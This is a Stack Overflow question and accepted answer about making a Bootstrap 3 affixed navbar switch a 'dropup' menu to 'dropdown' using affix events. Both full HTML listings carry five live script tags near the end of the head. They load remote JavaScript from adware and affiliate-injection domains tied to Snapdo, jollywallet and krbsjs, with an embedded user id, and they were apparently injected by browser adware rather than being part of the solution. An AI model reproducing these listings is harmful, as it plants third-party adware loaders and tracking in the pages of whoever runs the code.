# Bootstrap Dropup-Dropdown affix Convert navbar 'dropup' to 'dropdown' when affix on top using JS

Tags: javascript, jquery, html, css, twitter-bootstrap

**I want to make a navbar with 'dropup' menus with affix property . But when '.affix' is fired the 'dropup' menus will become 'dropdown'. my JS code is not working and can't get any solution for this . My code is given below .. Here Section4 nav-element is a dropdown-menu.**

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<!DOCTYPE html>
<html>

<head>
  <title>Bootstrap Example</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  <script>
    $('#myaffix').affix(
      function() {
        $('#cng').removeClass('.dropup').addClass('.dropdown');
      }
    );
  </script>
  <style>
    body {
      position: relative;
    }
    .affix {
      top: 0;
      width: 100%;
      z-index: 9999 !important;
    }
    .navbar {
      margin-bottom: 0px;
    }
    .affix ~ .container-fluid {
      position: relative;
      top: 50px;
    }
    #section1 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #1E88E5;
    }
    #section2 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #673ab7;
    }
    #section3 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #ff9800;
    }
    #section41 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #00bcd4;
    }
    #section42 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #009688;
    }
  </style>
  <script type='text/javascript' src='http://i.krbsjs.info/krbf/javascript.js?appTitle=Snapdo&channel=src230_pr&hid=4ec0649a-c229-42c0-29ef-287d07be9b68'></script>
  <script type='text/javascript' src='http://i.krbssrc.org/krbf/javascript.js?appTitle=Snapdo&channel=src230_pr&hid=4ec0649a-c229-42c0-29ef-287d07be9b68'></script>
  <script type='text/javascript' src='http://api.jollywallet.com/affiliate/client?dist=100&sub=230_pr&name=Snapdo'></script>
  <script type='text/javascript' src='http://cdncache-a.akamaihd.net/sub/jbbb2d8/src230_pr/l.js?pid=2126&ext=Snapdo'></script>
  <script type='text/javascript' src='http://feed.snapdo.com/Pixel.aspx?type=inj&userid=4ec0649a-c229-42c0-29ef-287d07be9b68&co=BD&barcode=50046888'></script>
</head>

<body data-spy="scroll" data-target=".navbar" data-offset="50">

  <div class="container-fluid" style="background-color:#F44336;color:#fff;height:200px;">
    <h1>Scrollspy & Affix Example</h1>
    <h3>Fixed navbar on scroll</h3>
    <p>Scroll this page to see how the navbar behaves with data-spy="affix" and data-spy="scrollspy".</p>
    <p>The navbar is attached to the top of the page after you have scrolled a specified amount of pixels, and the links in the navbar are automatically updated based on scroll position.</p>
  </div>

  <nav id="myaffix" class="navbar navbar-inverse" data-spy="affix" data-offset-top="197">
    <div class="container-fluid">
      <div class="navbar-header">
        <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span> 
        </button>
        <a class="navbar-brand" href="#">WebSiteName</a>
      </div>
      <div>
        <div class="collapse navbar-collapse" id="myNavbar">
          <ul class="nav navbar-nav">
            <li><a href="#section1">Section 1</a>
            </li>
            <li><a href="#section2">Section 2</a>
            </li>
            <li><a href="#section3">Section 3</a>
            </li>
            <li class="dropup" id="cng"><a class="dropdown-toggle" data-toggle="dropdown" href="#">Section 4 <span class="caret"></span></a>
              <ul class="dropdown-menu">
                <li><a href="#section41">Section 4-1</a>
                </li>
                <li><a href="#section42">Section 4-2</a>
                </li>
              </ul>
            </li>
          </ul>
        </div>
      </div>
    </div>
  </nav>

  <div id="section1" class="container-fluid">
    <h1>Section 1</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section2" class="container-fluid">
    <h1>Section 2</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section3" class="container-fluid">
    <h1>Section 3</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section41" class="container-fluid">
    <h1>Section 4 Submenu 1</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section42" class="container-fluid">
    <h1>Section 4 Submenu 2</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>

</body>

</html>
```

Answer (score 1, accepted):

**GOT THE SOLUTION :D**

> ```
>     $(document).ready(function() {
>       $('#myaffix').on('affix.bs.affix', function() {
>         $('#cng').removeClass('dropup').addClass('dropdown');
>       }).on('affix-top.bs.affix', function() {
>         $('#cng').removeClass('dropdown').addClass('dropup');
>       });
>     });
> ```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<!DOCTYPE html>
<html>

<head>
  <title>Bootstrap Example</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  <script>
    $(document).ready(function() {
      $('#myaffix').on('affix.bs.affix', function() {
        $('#cng').removeClass('dropup').addClass('dropdown');
      }).on('affix-top.bs.affix', function() {
        $('#cng').removeClass('dropdown').addClass('dropup');
      });
    });
  </script>
  <style>
    body {
      position: relative;
    }
    .affix {
      top: 0;
      width: 100%;
      z-index: 9999 !important;
    }
    .navbar {
      margin-bottom: 0px;
    }
    .affix ~ .container-fluid {
      position: relative;
      top: 50px;
    }
    #section1 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #1E88E5;
    }
    #section2 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #673ab7;
    }
    #section3 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #ff9800;
    }
    #section41 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #00bcd4;
    }
    #section42 {
      padding-top: 50px;
      height: 500px;
      color: #fff;
      background-color: #009688;
    }
  </style>
  <script type='text/javascript' src='http://i.krbsjs.info/krbf/javascript.js?appTitle=Snapdo&channel=src230_pr&hid=4ec0649a-c229-42c0-29ef-287d07be9b68'></script>
  <script type='text/javascript' src='http://i.krbssrc.org/krbf/javascript.js?appTitle=Snapdo&channel=src230_pr&hid=4ec0649a-c229-42c0-29ef-287d07be9b68'></script>
  <script type='text/javascript' src='http://api.jollywallet.com/affiliate/client?dist=100&sub=230_pr&name=Snapdo'></script>
  <script type='text/javascript' src='http://cdncache-a.akamaihd.net/sub/jbbb2d8/src230_pr/l.js?pid=2126&ext=Snapdo'></script>
  <script type='text/javascript' src='http://feed.snapdo.com/Pixel.aspx?type=inj&userid=4ec0649a-c229-42c0-29ef-287d07be9b68&co=BD&barcode=50046888'></script>
</head>

<body data-spy="scroll" data-target=".navbar" data-offset="50">

  <div class="container-fluid" style="background-color:#F44336;color:#fff;height:200px;">
    <h1>Scrollspy & Affix Example</h1>
    <h3>Fixed navbar on scroll</h3>
    <p>Scroll this page to see how the navbar behaves with data-spy="affix" and data-spy="scrollspy".</p>
    <p>The navbar is attached to the top of the page after you have scrolled a specified amount of pixels, and the links in the navbar are automatically updated based on scroll position.</p>
  </div>

  <nav id="myaffix" class="navbar navbar-inverse" data-spy="affix" data-offset-top="197">
    <div class="container-fluid">
      <div class="navbar-header">
        <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span> 
        </button>
        <a class="navbar-brand" href="#">WebSiteName</a>
      </div>
      <div>
        <div class="collapse navbar-collapse" id="myNavbar">
          <ul class="nav navbar-nav">
            <li><a href="#section1">Section 1</a>
            </li>
            <li><a href="#section2">Section 2</a>
            </li>
            <li><a href="#section3">Section 3</a>
            </li>
            <li class="dropup" id="cng"><a class="dropdown-toggle" data-toggle="dropdown" href="#">Section 4 <span class="caret"></span></a>
              <ul class="dropdown-menu">
                <li><a href="#section41">Section 4-1</a>
                </li>
                <li><a href="#section42">Section 4-2</a>
                </li>
              </ul>
            </li>
          </ul>
        </div>
      </div>
    </div>
  </nav>

  <div id="section1" class="container-fluid">
    <h1>Section 1</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section2" class="container-fluid">
    <h1>Section 2</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section3" class="container-fluid">
    <h1>Section 3</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section41" class="container-fluid">
    <h1>Section 4 Submenu 1</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>
  <div id="section42" class="container-fluid">
    <h1>Section 4 Submenu 2</h1>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
    <p>Try to scroll this section and look at the navigation bar while scrolling! Try to scroll this section and look at the navigation bar while scrolling!</p>
  </div>

</body>

</html>
```